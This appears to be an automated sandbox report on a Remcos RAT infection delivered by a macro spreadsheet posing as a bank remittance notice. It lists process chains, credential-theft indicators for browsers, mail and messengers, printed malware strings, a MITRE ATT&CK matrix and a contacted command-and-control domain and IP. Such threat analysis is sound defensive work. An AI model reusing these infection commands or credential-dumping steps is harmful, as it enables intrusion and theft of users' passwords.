Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\filesvr.exe	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\dwhqbdxsbnvloizrbdml'	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\nyuabviupwnyypwvkgznugfs'	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\psztcntndefdbvkhbrmoflajdfh'	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior

Source: Yara match

File source: app.xml, type: SAMPLE

Source: explorer.exe, 00000013.00000002.503893263.0000000000E10000.00000002.00020000.sdmp, logagent.exe, 00000018.00000000.387936546.0000000003670000.00000002.00020000.sdmp, logagent.exe, 0000002C.00000000.494461033.0000000002D90000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000013.00000002.503893263.0000000000E10000.00000002.00020000.sdmp, logagent.exe, 00000018.00000000.387936546.0000000003670000.00000002.00020000.sdmp, logagent.exe, 0000002C.00000000.494461033.0000000002D90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000002.503893263.0000000000E10000.00000002.00020000.sdmp, logagent.exe, 00000018.00000000.387936546.0000000003670000.00000002.00020000.sdmp, logagent.exe, 0000002C.00000000.494461033.0000000002D90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000013.00000002.503893263.0000000000E10000.00000002.00020000.sdmp, logagent.exe, 00000018.00000000.387936546.0000000003670000.00000002.00020000.sdmp, logagent.exe, 0000002C.00000000.494461033.0000000002D90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\logagent.exe	Code function: EnumSystemLocalesW,	24_2_0044A1D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoA,	24_2_0040D1E5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: EnumSystemLocalesW,	24_2_0044A21B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: EnumSystemLocalesW,	24_2_0044A2B6
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_0044A343
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,	24_2_004423BA
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,	24_2_0044A593
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_0044A6BC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetLocaleInfoW,	24_2_0044A7C3
Source: C:\Windows\SysWOW64\logagent.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_0044A890

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0042F9B4 cpuid

24_2_0042F9B4

Source: C:\Windows\SysWOW64\logagent.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_00404E9A GetLocalTime,CreateEventA,CreateThread,

24_2_00404E9A

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_00416D9E GetComputerNameExW,GetUserNameW,

24_2_00416D9E

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 24.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.509224017.0000000002748000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 3360, type: MEMORYSTR

Contains functionality to steal Firefox passwords or cookies

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		24_2_0040A012
Source: C:\Windows\SysWOW64\logagent.exe	Code function: \key3.db		24_2_0040A012

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match

File source: Process Memory Space: logagent.exe PID: 5016, type: MEMORYSTR

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\logagent.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 24.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.509224017.0000000002748000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 3360, type: MEMORYSTR

Detected Remcos RAT

Show sources

Source: logagent.exe	String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov\|
Source: logagent.exe, 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp	String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov\|

Source: C:\Windows\SysWOW64\logagent.exe

Code function: cmd.exe

24_2_004055EA

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Windows Service1	Extra Window Memory Injection1	Deobfuscate/Decode Files or Information1	Input Capture11	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Scripting22	Credentials in Registry1	System Service Discovery1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter2	Logon Script (Mac)	Windows Service1	Obfuscated Files or Information2	Credentials In Files2	File and Directory Discovery4	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Service Execution2	Network Logon Script	Process Injection422	Software Packing1	LSA Secrets	System Information Discovery35	SSH	Clipboard Data2	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell1	Rc.common	Registry Run Keys / Startup Folder1	Extra Window Memory Injection1	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol122	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading111	DCSync	Security Software Discovery31	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Modify Registry1	Proc Filesystem	Virtualization/Sandbox Evasion31	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion31	/etc/passwd and /etc/shadow	Process Discovery4	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation1	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection422	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
BoFA_Remittance Advice_21219.xlsm	7%	ReversingLabs	Script.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
24.0.logagent.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.2.logagent.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1116590	Download File
36.2.logagent.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1116566	Download File
24.2.logagent.exe.10590000.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
44.0.logagent.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
24.0.logagent.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
24.0.logagent.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
24.2.logagent.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
37.2.logagent.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1116590	Download File
24.0.logagent.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
44.0.logagent.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
39.2.Srakjle.exe.4170000.1.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
44.2.logagent.exe.10590000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
44.2.logagent.exe.250000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.imvu.comr	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	0%	URL Reputation	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	0%	URL Reputation	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	URL Reputation	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
twistednerd.dvrlists.com	31.3.152.100	true	false	high
onedrive.live.com	unknown	unknown	false	high
qcisaa.sn.files.1drv.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://shell.suite.office.com:1443	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
http://www.imvu.comr	logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/css/main.v2.min.css	bhvDE1F.tmp.36.dr	false		high
https://autodiscover-s.outlook.com/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://support.google.com	logagent.exe, 00000024.00000002.425807237.0000000004EC9000.00000004.00000001.sdmp	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://cdn.entity.	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
http://www.msn.com	bhvDE1F.tmp.36.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
http://www.nirsoft.net	logagent.exe, 00000024.00000002.424555845.0000000002D63000.00000004.00000001.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://api.aadrm.com/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png	bhvDE1F.tmp.36.dr	false		high
https://www.google.com/chrome/	bhvDE1F.tmp.36.dr	false		high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166	logagent.exe, 00000024.00000003.416783804.0000000004ED3000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	false		high
https://api.microsoftstream.com/api/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn	bhvDE1F.tmp.36.dr	false		high
https://cr.office.com	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.318468699.0000000006382000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c	logagent.exe, 00000024.00000003.418468317.0000000004EE8000.00000004.00000001.sdmp, logagent.exe, 00000024.00000003.421925979.0000000004EE8000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.311283223.0000000005321000.00000004.00000001.sdmp	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://officeci.azurewebsites.net/api/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg	bhvDE1F.tmp.36.dr	false		high
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
